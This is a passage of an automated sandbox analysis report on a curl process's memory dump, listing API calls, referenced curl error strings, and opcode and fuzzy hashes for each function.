                                • Instruction Fuzzy Hash: 27316D701087818FD325CF28945576ABBF1FB85318F1A0B5EE09AD7691EB30D805CB46
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A15B1
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A15CF
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A1629
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Cannot SELECT without a mailbox.$SELECT %s
                                • API String ID: 1294909896-2454231232
                                • Opcode ID: 5a2442d5b0ef87d0013b94ed9ecf27134dd8c218ef2ca593179291e51f00f020
                                • Instruction ID: 9542d0790eb45d0277938e777073d4ce78edb30c0cc0f2a88e1d4f282f79d565
                                • Opcode Fuzzy Hash: 5a2442d5b0ef87d0013b94ed9ecf27134dd8c218ef2ca593179291e51f00f020
                                • Instruction Fuzzy Hash: C6110832700615EFEB145B18EC49F69B7B9FF96724F14416AE905E7391DBB0AC008BD4
                                APIs
                                  • Part of subcall function 008721C0: FreeLibrary.KERNELBASE(00000000,?,00868EF6), ref: 00872208
                                  • Part of subcall function 008721C0: WSACleanup.WS2_32 ref: 00872227
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00868EF9
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00868F13
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00868F2B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00868F38
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00868F57
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$fclose$CleanupFreeLibrary
                                • String ID:
                                • API String ID: 3795980997-0
                                • Opcode ID: d7b68b2990a341a0ea80f7df10f8a4395a32e27e1bfed0da6c6d09c26d5b5c87
                                • Instruction ID: 87af97b9c2717488395890e675253228b370d234ab970131af40de056b212557
                                • Opcode Fuzzy Hash: d7b68b2990a341a0ea80f7df10f8a4395a32e27e1bfed0da6c6d09c26d5b5c87
                                • Instruction Fuzzy Hash: 80014071602E22EFC7125F55E844609FB71FF08B62715432BF50896A51CF71B8A4CBD0
                                APIs
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000000,0086D880), ref: 008687AC
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,?), ref: 008687B4
                                • _getch.API-MS-WIN-CRT-CONIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,?), ref: 008687C4
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002), ref: 008687EF
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(008B7668,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008687FB
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __acrt_iob_funcfputs$_getch
                                • String ID:
                                • API String ID: 3073499726-0
                                • Opcode ID: 2aba833417e031a1572183c95ded53af59b08edcbc0aa577ab778093153bf101
                                • Instruction ID: 0e34471ee01a8afcd6424207566723c4981f54ea1ef61853718fd34a6ee77b05
                                • Opcode Fuzzy Hash: 2aba833417e031a1572183c95ded53af59b08edcbc0aa577ab778093153bf101
                                • Instruction Fuzzy Hash: DCF0FC33940751D7C730232C6C0DBEAAB94FF96709F2A0336E599D2351D9994C4643AA
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,008629A6), ref: 00863AA3
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,008629A6), ref: 00863AB1
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,008629A6), ref: 00863ABD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,008629A6), ref: 00863AC9
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,008629A6), ref: 00863AD5
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,008629A6), ref: 00863AE7
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: c784e7cad9b39850965725126d146eb3989cc25654bce7ada61ec1aa09a80c0e
                                • Instruction ID: 815f1d2ba4d9c36a933d21f27f7e9870470a9d1a2edfb10f16752aa87010a1e3
                                • Opcode Fuzzy Hash: c784e7cad9b39850965725126d146eb3989cc25654bce7ada61ec1aa09a80c0e
                                • Instruction Fuzzy Hash: FD012C35503F109FC6715F95E848A2EBBF1FF883023018A0DE88796A61C730A515AF91
                                APIs
                                  • Part of subcall function 0087027A: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,?,?,008610B6), ref: 0087028E
                                  • Part of subcall function 0087027A: __alldvrm.LIBCMT ref: 008702A7
                                  • Part of subcall function 0087027A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008702D1
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0086C75B
                                  • Part of subcall function 00876BA2: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,0000038F,?,0086C775), ref: 00876BC3
                                  • Part of subcall function 00876BA2: WSACreateEvent.WS2_32 ref: 00876C4D
                                Strings
                                • Transfer aborted due to critical error in another transfer, xrefs: 0086C87D
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: CounterCreateEventPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@_time64calloc
                                • String ID: Transfer aborted due to critical error in another transfer
                                • API String ID: 934473979-1939301410
                                • Opcode ID: 316614a98c198b53d830f37d1ed4cf8e8c52ede8a799f83935cce44662564f96
                                • Instruction ID: 41c5bdecbbeda4428b2a08cca2c1861a4b84e4618d66f38642018f3f82c1e673
                                • Opcode Fuzzy Hash: 316614a98c198b53d830f37d1ed4cf8e8c52ede8a799f83935cce44662564f96
                                • Instruction Fuzzy Hash: 9AA1BD71D002199BCF15DBA8C448BFEBBB1FB49304F1A81A9D895E7341DB709E05CB90
                                APIs
                                • inet_pton.WS2_32(00000002,?,?), ref: 0088EAE7
                                • inet_pton.WS2_32(00000017,?,?), ref: 0088EB16
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: inet_pton
                                • String ID: Hostname %s was found in DNS cache$localhost
                                • API String ID: 1350483568-3522642687
                                • Opcode ID: c7ac4ef3514440a16f40262c75c3fd9cc0cbf9fd84ca578632a078ba1b2d18d8
                                • Instruction ID: 864c28aaac07a428f792737e4ba6eee13114c8538e79c4b0801cb754107b5643
                                • Opcode Fuzzy Hash: c7ac4ef3514440a16f40262c75c3fd9cc0cbf9fd84ca578632a078ba1b2d18d8
                                • Instruction Fuzzy Hash: 8B61C431E042199BDF25AF68C895AEEBBE6FF48320F14412AE815F7291DB309D41CB91
                                APIs
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 0087012E
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,internal error: invalid pattern type (%d),?), ref: 00870224
                                Strings
                                • internal error: invalid pattern type (%d), xrefs: 0087021D
                                • %0*lu, xrefs: 0087018E
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __acrt_iob_funcstrtoul
                                • String ID: %0*lu$internal error: invalid pattern type (%d)
                                • API String ID: 673873880-449433499
                                • Opcode ID: 6c09b19c644e9bf8e1141f8493ee1f17131f0bc4d08ed55a2f1a477889af6696
                                • Instruction ID: 46eef6b46685b68e5ba1a4bcbe0aa8a5b0e4e4566339b0e223ce54ff88924da7
                                • Opcode Fuzzy Hash: 6c09b19c644e9bf8e1141f8493ee1f17131f0bc4d08ed55a2f1a477889af6696
                                • Instruction Fuzzy Hash: A751A035A04209DBCF19CF68D894AEEBBB1FF49350F548169E84AE7386DA70D905CE60
                                APIs
                                • recvfrom.WS2_32(?,?,?,00000000,?,?), ref: 00898704
                                Strings
                                • Internal error: Unexpected packet, xrefs: 008988AB
                                • TFTP error: %s, xrefs: 00898819
                                • Received too short packet, xrefs: 0089874C
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: recvfrom
                                • String ID: Internal error: Unexpected packet$Received too short packet$TFTP error: %s
                                • API String ID: 846543921-343195773
                                • Opcode ID: ca36b9d729fb68850e42ec763b0cbb634247387b987b83c39f5ecc4cb044065f
                                • Instruction ID: 151894641bc718216ce55baeff3c5bc996c0eaec45310bbce4012d36a9f24363
                                • Opcode Fuzzy Hash: ca36b9d729fb68850e42ec763b0cbb634247387b987b83c39f5ecc4cb044065f
                                • Instruction Fuzzy Hash: 5D51D671600516DFDF18AA388C95BB9F7E5FB45310F088279E45EE6282DF34E9408BA0
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000000,00000000,blobpointer,?,?,?,?,?,?,?,?), ref: 0086EA46
                                • isprint.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?), ref: 0086EAF7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: isprintmalloc
                                • String ID: \x%02x$blobpointer
                                • API String ID: 3792030756-13518461
                                • Opcode ID: 82abc8bed5f294514693c0e221134c8662d3476c30ee0ab71d2ef8dba7b79631
                                • Instruction ID: 78235534a5361d8e802658c019c7a3ae920c3204bb419b1f4bf4a58d12476b6f
                                • Opcode Fuzzy Hash: 82abc8bed5f294514693c0e221134c8662d3476c30ee0ab71d2ef8dba7b79631
                                • Instruction Fuzzy Hash: C241493DA002569EDF249FA8D840BEDBBB2FF25324F29416EE4A5D3382D2304D41CB14
                                APIs
                                • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?), ref: 0086F70B
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004), ref: 0086F738
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0086F750
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strdupmallocrealloc
                                • String ID: out of memory
                                • API String ID: 178021264-2599737071
                                • Opcode ID: 497ae5ed91a98ed08b57b122337597105a74fd92410487980972df21c0b9dc3c
                                • Instruction ID: 2cbaa248f757529223977ad2a5a6db8476e389c1379822c02964e8789fa3e42b
                                • Opcode Fuzzy Hash: 497ae5ed91a98ed08b57b122337597105a74fd92410487980972df21c0b9dc3c
                                • Instruction Fuzzy Hash: 5751ACB8504246CFDB14CF78E494BA6BBF0FB06308F1980AADA4ACB352D770D905CB50
                                APIs
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,00875BA6,00000001), ref: 00875428
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00875BA6,00000001), ref: 0087543B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errnostrtoul
                                • String ID: %u.%u.%u.%u$0Lu@Ru@/Mu
                                • API String ID: 660391088-3973687180
                                • Opcode ID: 85cc4acebbe1c011d956d4de1f3fb4c49073f1dc8eb2fbdbdeacff9704fa2adc
                                • Instruction ID: 31e60998f2975b6025ec3b1218e7fa73103088e4e1b01658d1685e11223b124c
                                • Opcode Fuzzy Hash: 85cc4acebbe1c011d956d4de1f3fb4c49073f1dc8eb2fbdbdeacff9704fa2adc
                                • Instruction Fuzzy Hash: D04116B1C0050AABCB249BA8E8145BEB7B6FB05319F54817EE01DE2285D6F4CE41DB65
                                APIs
                                • CertFreeCertificateContext.CRYPT32(00000000), ref: 008A657A
                                Strings
                                • SSL: failed retrieving public key from server certificate, xrefs: 008A654C
                                • SSL: public key does not match pinned public key, xrefs: 008A653D
                                • schannel: Failed to read remote certificate context: %s, xrefs: 008A6561
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: CertCertificateContextFree
                                • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: Failed to read remote certificate context: %s
                                • API String ID: 3080675121-2322844371
                                • Opcode ID: 60ae10e2ba5f048fac9b8877c8f17429dfd79fda6256fa25c762c784688d90fb
                                • Instruction ID: 59ae28a73b3f9a232d000a8fed5570e395f99ce74cade037781cf93363077d91
                                • Opcode Fuzzy Hash: 60ae10e2ba5f048fac9b8877c8f17429dfd79fda6256fa25c762c784688d90fb
                                • Instruction Fuzzy Hash: AB31B031F0020A9BEB18DB28DC56BAE77B5FF46714F0840A9E509D7689FA70ED448F51
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 00884D4E
                                • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00884D65
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchrstrtol
                                • String ID: %s%s%s
                                • API String ID: 614545126-3094730333
                                • Opcode ID: b9146c0252155ca43d3d38780e9d85994ec0290a8c9ecd8fb0dcd701a934661b
                                • Instruction ID: c3315c53e25c53b3633425960b6cf70a0ebda5b40dc8dd0aee66d15afef8bfb6
                                • Opcode Fuzzy Hash: b9146c0252155ca43d3d38780e9d85994ec0290a8c9ecd8fb0dcd701a934661b
                                • Instruction Fuzzy Hash: 74310136A04246EFDF15EF98D840AADBFA5FF81324F2481A9E845DB341D7709E01CB40
                                APIs
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00000023,?,?,00000100,%*s,?,008B6DB0), ref: 00861A92
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID: #$%*s$-=O=-
                                • API String ID: 1795875747-742414071
                                • Opcode ID: 07bb768e633ed8745dc3881b4e5d97accb9885f30671a19115badeafd9b95144
                                • Instruction ID: 61426209769d9944e47717770f7611a01a5662314ed2e15e03bd779ed1b7f488
                                • Opcode Fuzzy Hash: 07bb768e633ed8745dc3881b4e5d97accb9885f30671a19115badeafd9b95144
                                • Instruction Fuzzy Hash: B141D1707045448FDB44CF6CD888AD577E6FB58310F2C86AAD889C7386E7B4E9A4CB50
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00882326
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00882383
                                Strings
                                • Too old connection (%ld seconds idle), disconnect it, xrefs: 00882342
                                • Too old connection (%ld seconds since creation), disconnect it, xrefs: 008823A3
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: Too old connection (%ld seconds idle), disconnect it$Too old connection (%ld seconds since creation), disconnect it
                                • API String ID: 885266447-3566769605
                                • Opcode ID: e16c9bf7d76a7fae3c06e6599e075d1720916c6468a0fb11efd507e02bfad12e
                                • Instruction ID: 815f0f51a29beee81648565190568b5ba3d602e1bc4d74a04543641bb636987d
                                • Opcode Fuzzy Hash: e16c9bf7d76a7fae3c06e6599e075d1720916c6468a0fb11efd507e02bfad12e
                                • Instruction Fuzzy Hash: 15112973A00A0067DB15FD2D4D56BAB36AAFF56310F1500B4BD2DEF351E4A69D0103D2
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 008685D1
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0086861E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086864D
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000310), ref: 0086867C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 008686F7
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00868795
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$_strdup$malloc
                                • String ID: option %s: %s
                                • API String ID: 854390910-1899588186
                                • Opcode ID: d9c9a0c5ce1ac00b5fd270b29d0d8718a0936150288373508b70ecbc346bc0bc
                                • Instruction ID: 8a2dbab88f4c739ef671b1918f85f496ab8cdad61d1933d82490ee2d91ec39a1
                                • Opcode Fuzzy Hash: d9c9a0c5ce1ac00b5fd270b29d0d8718a0936150288373508b70ecbc346bc0bc
                                • Instruction Fuzzy Hash: 3A210A31D08154EFCB329B6884597BEBFE5FF11310F26429AD5DDE6252CFB048818751
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __alldvrm
                                • String ID: "%s":$"%s":null$%I64u.%06I64u
                                • API String ID: 65215352-1521088119
                                • Opcode ID: 51f74fac272ede40bbd3b53dcc22335afb5b4a978d0cb3760da5b84c11cfedc8
                                • Instruction ID: 853ea0ce8bbe47da31220b0b8c4433a292625b27faa2a58e4702b84b6ce14819
                                • Opcode Fuzzy Hash: 51f74fac272ede40bbd3b53dcc22335afb5b4a978d0cb3760da5b84c11cfedc8
                                • Instruction Fuzzy Hash: 27119371508304AFD711DF58DC42E57BBE9FF55318F148529F8A8D2261E371DA608B92
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 00870A07
                                • strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?), ref: 00870A4D
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 00870A65
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _errno$strtoll
                                • String ID: 0Lu@Ru@/Mu
                                • API String ID: 146016610-1923536700
                                • Opcode ID: 067acdae0471363f7fb488055590290c1a9f27c101be3af1758cba00f1b2f7cc
                                • Instruction ID: 67c636b00d0d6e223854b8b2f1c837c6efc3fcbb8989cc6b39117898fc521b0d
                                • Opcode Fuzzy Hash: 067acdae0471363f7fb488055590290c1a9f27c101be3af1758cba00f1b2f7cc
